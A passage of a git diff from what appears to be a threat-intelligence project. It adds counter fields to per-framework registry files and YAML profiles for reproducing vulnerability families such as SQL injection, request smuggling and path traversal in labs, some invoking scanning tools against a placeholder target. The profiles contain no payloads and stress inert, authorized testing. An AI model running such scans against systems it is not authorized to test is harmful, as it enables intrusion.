0, "items": [] } diff --git a/08-threat-intel/registry/systems/echo.json b/08-threat-intel/registry/systems/echo.json index 6568d88f..b9b445b0 100644 --- a/08-threat-intel/registry/systems/echo.json +++ b/08-threat-intel/registry/systems/echo.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/esbuild.json b/08-threat-intel/registry/systems/esbuild.json index b01299c9..26fc3352 100644 --- a/08-threat-intel/registry/systems/esbuild.json +++ b/08-threat-intel/registry/systems/esbuild.json @@ -12,5 +12,9 @@ "dependency-upgrade-policy", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/express.json b/08-threat-intel/registry/systems/express.json index 82ce25fa..d10a4dd6 100644 --- a/08-threat-intel/registry/systems/express.json +++ b/08-threat-intel/registry/systems/express.json @@ -13,5 +13,9 @@ "ssrf-url-validation", "proxy-trust-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/fastify.json b/08-threat-intel/registry/systems/fastify.json index 507aca3e..7e585b2b 100644 --- a/08-threat-intel/registry/systems/fastify.json +++ b/08-threat-intel/registry/systems/fastify.json @@ -13,5 +13,9 @@ "ssrf-url-validation", "xss-output-encoding" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/flask.json b/08-threat-intel/registry/systems/flask.json index 10a9b719..551472f0 100644 --- a/08-threat-intel/registry/systems/flask.json +++ b/08-threat-intel/registry/systems/flask.json @@ -13,5 +13,9 @@ "ssrf-url-validation", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/ghost.json b/08-threat-intel/registry/systems/ghost.json index 2c5be15e..bd37e424 100644 --- a/08-threat-intel/registry/systems/ghost.json +++ b/08-threat-intel/registry/systems/ghost.json @@ -13,5 +13,9 @@ "xss-output-encoding", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/gin.json b/08-threat-intel/registry/systems/gin.json index ac325337..36f2fe41 100644 --- a/08-threat-intel/registry/systems/gin.json +++ b/08-threat-intel/registry/systems/gin.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "xss-output-encoding" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/gitea.json b/08-threat-intel/registry/systems/gitea.json index e2fdc7bf..fcee85fb 100644 --- a/08-threat-intel/registry/systems/gitea.json +++ b/08-threat-intel/registry/systems/gitea.json @@ -13,6 +13,10 @@ "token-cookie-storage", "proxy-trust-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 37, "items": [ "gitea--CVE-2026-0798", "gitea--CVE-2026-20736", diff --git a/08-threat-intel/registry/systems/gitlab-ce.json b/08-threat-intel/registry/systems/gitlab-ce.json index 1e28b4be..e5fb3c46 100644 --- a/08-threat-intel/registry/systems/gitlab-ce.json +++ b/08-threat-intel/registry/systems/gitlab-ce.json @@ -13,5 +13,9 @@ "token-cookie-storage", "deserialization-safety" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/grafana.json b/08-threat-intel/registry/systems/grafana.json index 3eb1c394..00bf1f78 100644 --- a/08-threat-intel/registry/systems/grafana.json +++ b/08-threat-intel/registry/systems/grafana.json @@ -13,5 +13,9 @@ "plugin-extension-trust-policy", "xss-output-encoding" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/hapi.json b/08-threat-intel/registry/systems/hapi.json index 1a4da902..97df7ece 100644 --- a/08-threat-intel/registry/systems/hapi.json +++ b/08-threat-intel/registry/systems/hapi.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/haproxy.json b/08-threat-intel/registry/systems/haproxy.json index 992a0ed0..a3836bd0 100644 --- a/08-threat-intel/registry/systems/haproxy.json +++ b/08-threat-intel/registry/systems/haproxy.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "request-smuggling-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/jenkins.json b/08-threat-intel/registry/systems/jenkins.json index 8aabd788..14ba8f9b 100644 --- a/08-threat-intel/registry/systems/jenkins.json +++ b/08-threat-intel/registry/systems/jenkins.json @@ -13,5 +13,9 @@ "authz-server-side-recheck", "deserialization-safety" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/joomla.json b/08-threat-intel/registry/systems/joomla.json index 012cfcec..63c96c3d 100644 --- a/08-threat-intel/registry/systems/joomla.json +++ b/08-threat-intel/registry/systems/joomla.json @@ -14,5 +14,9 @@ "path-traversal-guard", "plugin-extension-trust-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/kibana.json b/08-threat-intel/registry/systems/kibana.json index f8002873..dfd454b1 100644 --- a/08-threat-intel/registry/systems/kibana.json +++ b/08-threat-intel/registry/systems/kibana.json @@ -13,5 +13,9 @@ "xss-output-encoding", "proxy-trust-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/koa.json b/08-threat-intel/registry/systems/koa.json index f05032ee..4558494a 100644 --- a/08-threat-intel/registry/systems/koa.json +++ b/08-threat-intel/registry/systems/koa.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "ssrf-url-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/laravel.json b/08-threat-intel/registry/systems/laravel.json index 28c2c342..f04a58ab 100644 --- a/08-threat-intel/registry/systems/laravel.json +++ b/08-threat-intel/registry/systems/laravel.json @@ -13,5 +13,9 @@ "authz-server-side-recheck", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/magento-open-source.json b/08-threat-intel/registry/systems/magento-open-source.json index ee486e5c..c7c3b1d7 100644 --- a/08-threat-intel/registry/systems/magento-open-source.json +++ b/08-threat-intel/registry/systems/magento-open-source.json @@ -13,5 +13,9 @@ "file-upload-validation", "plugin-extension-trust-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/mattermost.json b/08-threat-intel/registry/systems/mattermost.json index 4804a8d7..475bc17a 100644 --- a/08-threat-intel/registry/systems/mattermost.json +++ b/08-threat-intel/registry/systems/mattermost.json @@ -13,5 +13,9 @@ "xss-output-encoding", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/mediawiki.json b/08-threat-intel/registry/systems/mediawiki.json index df05fc30..d3e461bf 100644 --- a/08-threat-intel/registry/systems/mediawiki.json +++ b/08-threat-intel/registry/systems/mediawiki.json @@ -13,5 +13,9 @@ "authz-server-side-recheck", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/medusa.json b/08-threat-intel/registry/systems/medusa.json index 5d80b34a..126ad491 100644 --- a/08-threat-intel/registry/systems/medusa.json +++ b/08-threat-intel/registry/systems/medusa.json @@ -12,5 +12,9 @@ "authz-server-side-recheck", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/moodle.json b/08-threat-intel/registry/systems/moodle.json index 69c914d1..3bec4c00 100644 --- a/08-threat-intel/registry/systems/moodle.json +++ b/08-threat-intel/registry/systems/moodle.json @@ -13,5 +13,9 @@ "xss-output-encoding", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/nestjs.json b/08-threat-intel/registry/systems/nestjs.json index d52d6b59..8a11da0a 100644 --- a/08-threat-intel/registry/systems/nestjs.json +++ b/08-threat-intel/registry/systems/nestjs.json @@ -13,5 +13,9 @@ "token-cookie-storage", "ssrf-url-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/nextjs.json b/08-threat-intel/registry/systems/nextjs.json index aafebbef..79896081 100644 --- a/08-threat-intel/registry/systems/nextjs.json +++ b/08-threat-intel/registry/systems/nextjs.json @@ -13,6 +13,10 @@ "proxy-trust-boundary", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 26, "items": [ "nextjs--GHSA-h25m-26qc-wcjf", "nextjs--CVE-2025-59472", diff --git a/08-threat-intel/registry/systems/nginx.json b/08-threat-intel/registry/systems/nginx.json index 0b0e9976..9f7c93be 100644 --- a/08-threat-intel/registry/systems/nginx.json +++ b/08-threat-intel/registry/systems/nginx.json @@ -13,5 +13,9 @@ "request-smuggling-boundary", "csp-trusted-types" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/nodejs.json b/08-threat-intel/registry/systems/nodejs.json index e77aefb3..b12919aa 100644 --- a/08-threat-intel/registry/systems/nodejs.json +++ b/08-threat-intel/registry/systems/nodejs.json @@ -13,5 +13,9 @@ "request-smuggling-boundary", "dependency-upgrade-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/nuxt.json b/08-threat-intel/registry/systems/nuxt.json index b0efeaa1..4eb4df5b 100644 --- a/08-threat-intel/registry/systems/nuxt.json +++ b/08-threat-intel/registry/systems/nuxt.json @@ -13,5 +13,9 @@ "proxy-trust-boundary", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/opencart.json b/08-threat-intel/registry/systems/opencart.json index bd67defe..ad6658a7 100644 --- a/08-threat-intel/registry/systems/opencart.json +++ b/08-threat-intel/registry/systems/opencart.json @@ -13,5 +13,9 @@ "plugin-extension-trust-policy", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/openmage.json b/08-threat-intel/registry/systems/openmage.json index 247d7b63..a6e7c5e1 100644 --- a/08-threat-intel/registry/systems/openmage.json +++ b/08-threat-intel/registry/systems/openmage.json @@ -12,5 +12,9 @@ "authz-server-side-recheck", "plugin-extension-trust-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/phpmyadmin.json b/08-threat-intel/registry/systems/phpmyadmin.json index 887d3aa2..e692c86f 100644 --- a/08-threat-intel/registry/systems/phpmyadmin.json +++ b/08-threat-intel/registry/systems/phpmyadmin.json @@ -13,5 +13,9 @@ "authz-server-side-recheck", "path-traversal-guard" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/prestashop.json b/08-threat-intel/registry/systems/prestashop.json index 94f72f43..7543550e 100644 --- a/08-threat-intel/registry/systems/prestashop.json +++ b/08-threat-intel/registry/systems/prestashop.json @@ -13,5 +13,9 @@ "authz-server-side-recheck", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/rails.json b/08-threat-intel/registry/systems/rails.json index bdcceb45..27b69711 100644 --- a/08-threat-intel/registry/systems/rails.json +++ b/08-threat-intel/registry/systems/rails.json @@ -13,5 +13,9 @@ "file-upload-validation", "authz-server-side-recheck" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/react.json b/08-threat-intel/registry/systems/react.json index a4f66c60..8b5ca1a5 100644 --- a/08-threat-intel/registry/systems/react.json +++ b/08-threat-intel/registry/systems/react.json @@ -13,5 +13,9 @@ "dom-sink-hardening", "csp-trusted-types" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/redmine.json b/08-threat-intel/registry/systems/redmine.json index 6fda2aa4..f3568798 100644 --- a/08-threat-intel/registry/systems/redmine.json +++ b/08-threat-intel/registry/systems/redmine.json @@ -13,5 +13,9 @@ "xss-output-encoding", "plugin-extension-trust-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/saleor.json b/08-threat-intel/registry/systems/saleor.json index ae54ffe8..98fdf551 100644 --- a/08-threat-intel/registry/systems/saleor.json +++ b/08-threat-intel/registry/systems/saleor.json @@ -12,5 +12,9 @@ "authz-server-side-recheck", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/shopware.json b/08-threat-intel/registry/systems/shopware.json index c8f8bc8f..edde7eae 100644 --- a/08-threat-intel/registry/systems/shopware.json +++ b/08-threat-intel/registry/systems/shopware.json @@ -13,5 +13,9 @@ "plugin-extension-trust-policy", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/spring-boot.json b/08-threat-intel/registry/systems/spring-boot.json index 8ea78a99..b3645400 100644 --- a/08-threat-intel/registry/systems/spring-boot.json +++ b/08-threat-intel/registry/systems/spring-boot.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "authz-server-side-recheck" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/spring-framework.json b/08-threat-intel/registry/systems/spring-framework.json index 7eaa9419..9636f0b8 100644 --- a/08-threat-intel/registry/systems/spring-framework.json +++ b/08-threat-intel/registry/systems/spring-framework.json @@ -13,5 +13,9 @@ "path-traversal-guard", "deserialization-safety" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/spring-security.json b/08-threat-intel/registry/systems/spring-security.json index 6da6e988..d53c14d0 100644 --- a/08-threat-intel/registry/systems/spring-security.json +++ b/08-threat-intel/registry/systems/spring-security.json @@ -13,5 +13,9 @@ "token-cookie-storage", "proxy-trust-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/strapi.json b/08-threat-intel/registry/systems/strapi.json index de6ee39d..9f44c350 100644 --- a/08-threat-intel/registry/systems/strapi.json +++ b/08-threat-intel/registry/systems/strapi.json @@ -13,5 +13,9 @@ "token-cookie-storage", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/sveltekit.json b/08-threat-intel/registry/systems/sveltekit.json index 273e9fa5..07c93bff 100644 --- a/08-threat-intel/registry/systems/sveltekit.json +++ b/08-threat-intel/registry/systems/sveltekit.json @@ -12,5 +12,9 @@ "authz-server-side-recheck", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/symfony.json b/08-threat-intel/registry/systems/symfony.json index d57c8ce7..d0a08602 100644 --- a/08-threat-intel/registry/systems/symfony.json +++ b/08-threat-intel/registry/systems/symfony.json @@ -13,5 +13,9 @@ "authz-server-side-recheck", "path-traversal-guard" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/traefik.json b/08-threat-intel/registry/systems/traefik.json index 498bc09f..fcd440de 100644 --- a/08-threat-intel/registry/systems/traefik.json +++ b/08-threat-intel/registry/systems/traefik.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "request-smuggling-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/undici.json b/08-threat-intel/registry/systems/undici.json index 49ed7617..76cf4729 100644 --- a/08-threat-intel/registry/systems/undici.json +++ b/08-threat-intel/registry/systems/undici.json @@ -12,6 +12,10 @@ "ssrf-url-validation", "proxy-trust-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 14, "items": [ "undici--CVE-2026-1526", "undici--CVE-2026-2229", diff --git a/08-threat-intel/registry/systems/vite.json b/08-threat-intel/registry/systems/vite.json index 619c9a85..a252d304 100644 --- a/08-threat-intel/registry/systems/vite.json +++ b/08-threat-intel/registry/systems/vite.json @@ -13,6 +13,10 @@ "file-upload-validation", "proxy-trust-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 12, "items": [ "vite--CVE-2025-62522", "vite--CVE-2025-58751", diff --git a/08-threat-intel/registry/systems/vue.json b/08-threat-intel/registry/systems/vue.json index cee25add..e1910350 100644 --- a/08-threat-intel/registry/systems/vue.json +++ b/08-threat-intel/registry/systems/vue.json @@ -13,5 +13,9 @@ "template-injection-guard", "csp-trusted-types" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/webpack.json b/08-threat-intel/registry/systems/webpack.json index 77f7da4b..4d8dc320 100644 --- a/08-threat-intel/registry/systems/webpack.json +++ b/08-threat-intel/registry/systems/webpack.json @@ -12,5 +12,9 @@ "dependency-upgrade-policy", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/werkzeug.json b/08-threat-intel/registry/systems/werkzeug.json index f7f3242e..71c75e2e 100644 --- a/08-threat-intel/registry/systems/werkzeug.json +++ b/08-threat-intel/registry/systems/werkzeug.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "request-smuggling-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/woocommerce.json b/08-threat-intel/registry/systems/woocommerce.json index 06deaa24..81fec966 100644 --- a/08-threat-intel/registry/systems/woocommerce.json +++ b/08-threat-intel/registry/systems/woocommerce.json @@ -13,5 +13,9 @@ "xss-output-encoding", "authz-server-side-recheck" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/wordpress.json b/08-threat-intel/registry/systems/wordpress.json index 8e2d49ac..3fd7f1cd 100644 --- a/08-threat-intel/registry/systems/wordpress.json +++ b/08-threat-intel/registry/systems/wordpress.json @@ -14,5 +14,9 @@ "file-upload-validation", "token-cookie-storage" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/repro-profiles/family-generic/authz-bypass-generic.yaml b/08-threat-intel/repro-profiles/family-generic/authz-bypass-generic.yaml new file mode 100644 index 00000000..d626073d --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/authz-bypass-generic.yaml @@ -0,0 +1,31 @@ +profile_id: authz-bypass-generic +match_rules: + keywords: + - authorization bypass + - auth bypass + - access control +vuln_family: authz-bypass +provisioning_mode: real +artifact_source: + strategy: official-image-or-source +required_services: + - app +seed_actions: + - kind: note + message: Create low-privilege and admin test users for server-side recheck validation. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Use minimal authorization bypass probes defined by case-specific runner or manual session tooling. +browser_assertions: + required: false +success_criteria: + - Protected route or action is evaluated with controlled credentials and logged. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/deserialization-generic.yaml b/08-threat-intel/repro-profiles/family-generic/deserialization-generic.yaml new file mode 100644 index 00000000..01a0dafa --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/deserialization-generic.yaml @@ -0,0 +1,30 @@ +profile_id: deserialization-generic +match_rules: + keywords: + - deserialization + - serialization +vuln_family: deserialization +provisioning_mode: synthetic +artifact_source: + strategy: source-or-synthetic +required_services: + - app +seed_actions: + - kind: note + message: Use inert serialized payloads and do not execute gadget chains against non-lab targets. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Demonstrate unsafe decode path with inert object graph or marker token. +browser_assertions: + required: false +success_criteria: + - Deserialization path is confirmed without executing destructive gadget chains. +cleanup_policy: destroy +destructive_risk: high +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/file-upload-generic.yaml b/08-threat-intel/repro-profiles/family-generic/file-upload-generic.yaml new file mode 100644 index 00000000..2610cc05 --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/file-upload-generic.yaml @@ -0,0 +1,31 @@ +profile_id: file-upload-generic +match_rules: + keywords: + - file upload + - attachment + - upload +vuln_family: file-upload +provisioning_mode: real +artifact_source: + strategy: official-image-or-source +required_services: + - app +seed_actions: + - kind: note + message: Use inert marker files and non-executable payloads by default. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Validate extension, storage path, and preview behavior using inert files. +browser_assertions: + required: true +success_criteria: + - Upload acceptance or bypass path is demonstrated with reversible test artifacts. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/misconfiguration-generic.yaml b/08-threat-intel/repro-profiles/family-generic/misconfiguration-generic.yaml new file mode 100644 index 00000000..f7838e1a --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/misconfiguration-generic.yaml @@ -0,0 +1,41 @@ +profile_id: misconfiguration-generic +match_rules: + keywords: + - misconfiguration + - debug + - default config + - default credentials +vuln_family: misconfiguration +provisioning_mode: real +artifact_source: + strategy: official-image-or-source +required_services: + - app +seed_actions: + - kind: note + message: Keep checks limited to target-local paths and configured lab endpoints. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: tool + tool: misconfig-lab + args: + - "--target" + - "{target_url}" + - "--evidence-dir" + - "{evidence_dir}" + - "--run-id" + - "{run_id}" + - "--case-id" + - "{case_id}" +browser_assertions: + required: false +success_criteria: + - Misconfiguration indicator is captured with HTTP or server evidence. +cleanup_policy: destroy +destructive_risk: low +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/path-traversal-generic.yaml b/08-threat-intel/repro-profiles/family-generic/path-traversal-generic.yaml new file mode 100644 index 00000000..10535e12 --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/path-traversal-generic.yaml @@ -0,0 +1,30 @@ +profile_id: path-traversal-generic +match_rules: + keywords: + - path traversal + - directory traversal +vuln_family: path-traversal +provisioning_mode: real +artifact_source: + strategy: official-image-or-source +required_services: + - app +seed_actions: + - kind: note + message: Use inert marker files inside isolated volume mounts only. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Validate canonicalization failures with marker files rather than real secrets. +browser_assertions: + required: false +success_criteria: + - Marker file outside intended root becomes reachable or denial path is confirmed. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/plugin-extension-generic.yaml b/08-threat-intel/repro-profiles/family-generic/plugin-extension-generic.yaml new file mode 100644 index 00000000..76ea16b9 --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/plugin-extension-generic.yaml @@ -0,0 +1,32 @@ +profile_id: plugin-extension-generic +match_rules: + keywords: + - plugin + - module + - extension + - theme +vuln_family: plugin-extension +provisioning_mode: synthetic +artifact_source: + strategy: ecosystem-package-or-synthetic +required_services: + - app +seed_actions: + - kind: note + message: Prefer historical plugin/module package; fall back to synthetic isolated reproduction when unavailable. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Validate trust-boundary or input-handling weakness using isolated extension package only. +browser_assertions: + required: true +success_criteria: + - Extension-specific attack path is demonstrated or blocked with artifact evidence. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/proxy-boundary-generic.yaml b/08-threat-intel/repro-profiles/family-generic/proxy-boundary-generic.yaml new file mode 100644 index 00000000..80182ef4 --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/proxy-boundary-generic.yaml @@ -0,0 +1,40 @@ +profile_id: proxy-boundary-generic +match_rules: + keywords: + - proxy + - middleware + - header trust +vuln_family: proxy-boundary +provisioning_mode: real +artifact_source: + strategy: official-image-or-source +required_services: + - app +seed_actions: + - kind: note + message: Log reverse-proxy and application headers before any trust-boundary test. +baseline_actions: + - kind: tool + tool: site-scope-mapper + args: + - "--target" + - "127.0.0.1" + - "--evidence-dir" + - "{evidence_dir}" + - "--run-id" + - "{run_id}" + - "--case-id" + - "{case_id}" +attack_actions: + - kind: note + message: Perform minimal forwarded-header manipulation only inside isolated lab paths. +browser_assertions: + required: false +success_criteria: + - Header trust discrepancy is captured with upstream/downstream logs. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/request-smuggling-generic.yaml b/08-threat-intel/repro-profiles/family-generic/request-smuggling-generic.yaml new file mode 100644 index 00000000..633d2682 --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/request-smuggling-generic.yaml @@ -0,0 +1,30 @@ +profile_id: request-smuggling-generic +match_rules: + keywords: + - request smuggling + - http desync +vuln_family: request-smuggling +provisioning_mode: synthetic +artifact_source: + strategy: synthetic-proxy-pair +required_services: + - app +seed_actions: + - kind: note + message: Stand up isolated proxy/app pair only; do not forward to unrelated targets. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Run minimal ambiguous request probes and capture both proxy and app logs. +browser_assertions: + required: false +success_criteria: + - Proxy and backend parse disagreement is captured in evidence. +cleanup_policy: destroy +destructive_risk: high +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/session-token-generic.yaml b/08-threat-intel/repro-profiles/family-generic/session-token-generic.yaml new file mode 100644 index 00000000..9d2be72e --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/session-token-generic.yaml @@ -0,0 +1,42 @@ +profile_id: session-token-generic +match_rules: + keywords: + - token + - cookie + - session + - jwt + - localstorage +vuln_family: session-token +provisioning_mode: real +artifact_source: + strategy: official-image-or-source +required_services: + - app +seed_actions: + - kind: note + message: Seed only local demo identities and short-lived cookies/tokens. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: tool + tool: session-lab + args: + - "--target" + - "{target_url}" + - "--evidence-dir" + - "{evidence_dir}" + - "--run-id" + - "{run_id}" + - "--case-id" + - "{case_id}" +browser_assertions: + required: true +success_criteria: + - Cookie, storage or fixation issue is captured with browser and header evidence. +cleanup_policy: destroy +destructive_risk: low +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/sqli-generic.yaml b/08-threat-intel/repro-profiles/family-generic/sqli-generic.yaml new file mode 100644 index 00000000..9cca676b --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/sqli-generic.yaml @@ -0,0 +1,39 @@ +profile_id: sqli-generic +match_rules: + keywords: + - sql injection + - sqli +vuln_family: sqli +provisioning_mode: synthetic +artifact_source: + strategy: official-image-or-synthetic +required_services: + - app +seed_actions: + - kind: note + message: Keep seed data reversible and avoid destructive SQL mutations. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: tool + tool: sqli-scanner + args: + - "-u" + - "{target_url}" + - "--evidence-dir" + - "{evidence_dir}" + - "--run-id" + - "{run_id}" + - "--case-id" + - "{case_id}" +browser_assertions: + required: false +success_criteria: + - Time-based or error-based probe lands with non-destructive evidence. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/ssrf-generic.yaml b/08-threat-intel/repro-profiles/family-generic/ssrf-generic.yaml new file mode 